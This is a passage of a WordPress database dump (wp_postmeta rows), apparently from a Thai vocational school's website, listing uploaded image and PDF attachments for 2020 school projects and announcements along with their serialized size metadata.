(27237, 11008, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:75:\"2020/12/ทดสอบมาตรฐานการใช้คอม.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:75:\"ทดสอบมาตรฐานการใช้คอม-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:75:\"ทดสอบมาตรฐานการใช้คอม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:76:\"ทดสอบมาตรฐานการใช้คอม-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:76:\"ทดสอบมาตรฐานการใช้คอม-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:75:\"ทดสอบมาตรฐานการใช้คอม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27238, 11009, '_wp_attached_file', '2020/12/โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-อวท63.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(27239, 11009, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:898;s:6:\"height\";i:1276;s:4:\"file\";s:141:\"2020/12/โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-อวท63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:141:\"โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-อวท63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:141:\"โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-อวท63-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:142:\"โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-อวท63-768x1091.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1091;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:142:\"โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-อวท63-721x1024.jpg\";s:5:\"width\";i:721;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:141:\"โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-อวท63-211x300.jpg\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27240, 11010, '_wp_attached_file', '2020/12/โครงการแข่งขันทักษะวิชาการปิโตรเคมี.jpg'),
(27241, 11010, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:117:\"2020/12/โครงการแข่งขันทักษะวิชาการปิโตรเคมี.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:117:\"โครงการแข่งขันทักษะวิชาการปิโตรเคมี-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:117:\"โครงการแข่งขันทักษะวิชาการปิโตรเคมี-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:118:\"โครงการแข่งขันทักษะวิชาการปิโตรเคมี-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:118:\"โครงการแข่งขันทักษะวิชาการปิโตรเคมี-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:117:\"โครงการแข่งขันทักษะวิชาการปิโตรเคมี-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27242, 11011, '_wp_attached_file', '2020/12/โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน.jpg'),
(27243, 11011, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:132:\"2020/12/โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:132:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:132:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:133:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:133:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:132:\"โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27244, 11012, '_wp_attached_file', '2020/12/โครงการแข่งขันการตอบปัญหาวิชาการ.jpg'),
(27245, 11012, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:108:\"2020/12/โครงการแข่งขันการตอบปัญหาวิชาการ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:108:\"โครงการแข่งขันการตอบปัญหาวิชาการ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:108:\"โครงการแข่งขันการตอบปัญหาวิชาการ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:109:\"โครงการแข่งขันการตอบปัญหาวิชาการ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:109:\"โครงการแข่งขันการตอบปัญหาวิชาการ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:108:\"โครงการแข่งขันการตอบปัญหาวิชาการ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27246, 11013, '_wp_attached_file', '2020/12/23-โครงการออมทรัพย์กับธนาคารโรงเรียน63.jpg'),
(27247, 11013, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:116:\"2020/12/23-โครงการออมทรัพย์กับธนาคารโรงเรียน63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:116:\"23-โครงการออมทรัพย์กับธนาคารโรงเรียน63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:116:\"23-โครงการออมทรัพย์กับธนาคารโรงเรียน63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:117:\"23-โครงการออมทรัพย์กับธนาคารโรงเรียน63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:117:\"23-โครงการออมทรัพย์กับธนาคารโรงเรียน63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:116:\"23-โครงการออมทรัพย์กับธนาคารโรงเรียน63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27248, 11014, '_wp_attached_file', '2020/12/พัฒนาคุณธรรมจริยธรรม.jpg'),
(27249, 11014, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:724;s:6:\"height\";i:1024;s:4:\"file\";s:72:\"2020/12/พัฒนาคุณธรรมจริยธรรม.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:72:\"พัฒนาคุณธรรมจริยธรรม-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:72:\"พัฒนาคุณธรรมจริยธรรม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:73:\"พัฒนาคุณธรรมจริยธรรม-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:72:\"พัฒนาคุณธรรมจริยธรรม-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27250, 11015, '_wp_attached_file', '2020/12/โครงการกีฬาสีภายใน63.jpg'),
(27251, 11015, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:68:\"2020/12/โครงการกีฬาสีภายใน63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:68:\"โครงการกีฬาสีภายใน63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:68:\"โครงการกีฬาสีภายใน63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:69:\"โครงการกีฬาสีภายใน63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:69:\"โครงการกีฬาสีภายใน63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:68:\"โครงการกีฬาสีภายใน63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27252, 11016, '_wp_attached_file', '2020/12/โครงการประกวดโครการวิชาชีพ63.jpg'),
(27253, 11016, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:92:\"2020/12/โครงการประกวดโครการวิชาชีพ63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:92:\"โครงการประกวดโครการวิชาชีพ63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:92:\"โครงการประกวดโครการวิชาชีพ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:93:\"โครงการประกวดโครการวิชาชีพ63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:93:\"โครงการประกวดโครการวิชาชีพ63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:92:\"โครงการประกวดโครการวิชาชีพ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27254, 11017, '_wp_attached_file', '2020/12/โครงการคอมพิวเตอร์ธุรกิจฟื้นฟูวิถีชาวพุทธ63.jpg'),
(27255, 11017, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:137:\"2020/12/โครงการคอมพิวเตอร์ธุรกิจฟื้นฟูวิถีชาวพุทธ63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:137:\"โครงการคอมพิวเตอร์ธุรกิจฟื้นฟูวิถีชาวพุทธ63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:137:\"โครงการคอมพิวเตอร์ธุรกิจฟื้นฟูวิถีชาวพุทธ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:138:\"โครงการคอมพิวเตอร์ธุรกิจฟื้นฟูวิถีชาวพุทธ63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:138:\"โครงการคอมพิวเตอร์ธุรกิจฟื้นฟูวิถีชาวพุทธ63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:137:\"โครงการคอมพิวเตอร์ธุรกิจฟื้นฟูวิถีชาวพุทธ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27256, 11018, '_wp_attached_file', '2020/12/โครงการส่งเสริมการหารายได้ระหว่างเรียน63.jpg'),
(27257, 11018, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1654;s:6:\"height\";i:2339;s:4:\"file\";s:128:\"2020/12/โครงการส่งเสริมการหารายได้ระหว่างเรียน63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:128:\"โครงการส่งเสริมการหารายได้ระหว่างเรียน63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:128:\"โครงการส่งเสริมการหารายได้ระหว่างเรียน63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:129:\"โครงการส่งเสริมการหารายได้ระหว่างเรียน63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:129:\"โครงการส่งเสริมการหารายได้ระหว่างเรียน63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:128:\"โครงการส่งเสริมการหารายได้ระหว่างเรียน63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27258, 11019, '_wp_attached_file', '2020/12/โครงการเสริมสร้างบุคลิกภาพ63.jpg'),
(27259, 11019, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1240;s:6:\"height\";i:1754;s:4:\"file\";s:92:\"2020/12/โครงการเสริมสร้างบุคลิกภาพ63.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:92:\"โครงการเสริมสร้างบุคลิกภาพ63-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:92:\"โครงการเสริมสร้างบุคลิกภาพ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:93:\"โครงการเสริมสร้างบุคลิกภาพ63-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:93:\"โครงการเสริมสร้างบุคลิกภาพ63-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:92:\"โครงการเสริมสร้างบุคลิกภาพ63-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27260, 11021, '_wp_attached_file', '2020/12/ประกาศพ้นสภาพไม่ลงทะเบียน2-2563.pdf'),
(27261, 11024, '_edit_lock', '1608801760:14'),
(27262, 11024, '_edit_last', '14'),
(27263, 11025, '_wp_attached_file', '2020/12/20201224132029891.pdf'),
(27266, 11024, '_hide_featured', NULL),
(27275, 11027, '_wp_attached_file', '2020/12/ประกาศพ้นสภาพไม่ลงทะเบียน2-25631.pdf'),
(27276, 11028, '_wp_attached_file', '2020/12/ประกาศพ้นสภาพไม่ลงทะเบียน2-25631-1.pdf'),
(27277, 11032, '_wp_attached_file', '2019/12/25126301.jpg'),
(27278, 11032, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1800;s:6:\"height\";i:450;s:4:\"file\";s:20:\"2019/12/25126301.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"25126301-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"25126301-300x75.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"25126301-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"25126301-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"25126301-400x100.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27279, 11033, '_wp_attached_file', '2019/12/25126302.png'),
(27280, 11033, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1800;s:6:\"height\";i:450;s:4:\"file\";s:20:\"2019/12/25126302.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"25126302-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"25126302-300x75.png\";s:5:\"width\";i:300;s:6:\"height\";i:75;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"25126302-768x192.png\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"25126302-1024x256.png\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"25126302-400x100.png\";s:5:\"width\";i:400;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27281, 11034, '_wp_attached_file', '2019/12/25126301.png'),
(27282, 11034, '_wp_attachment_metadata', 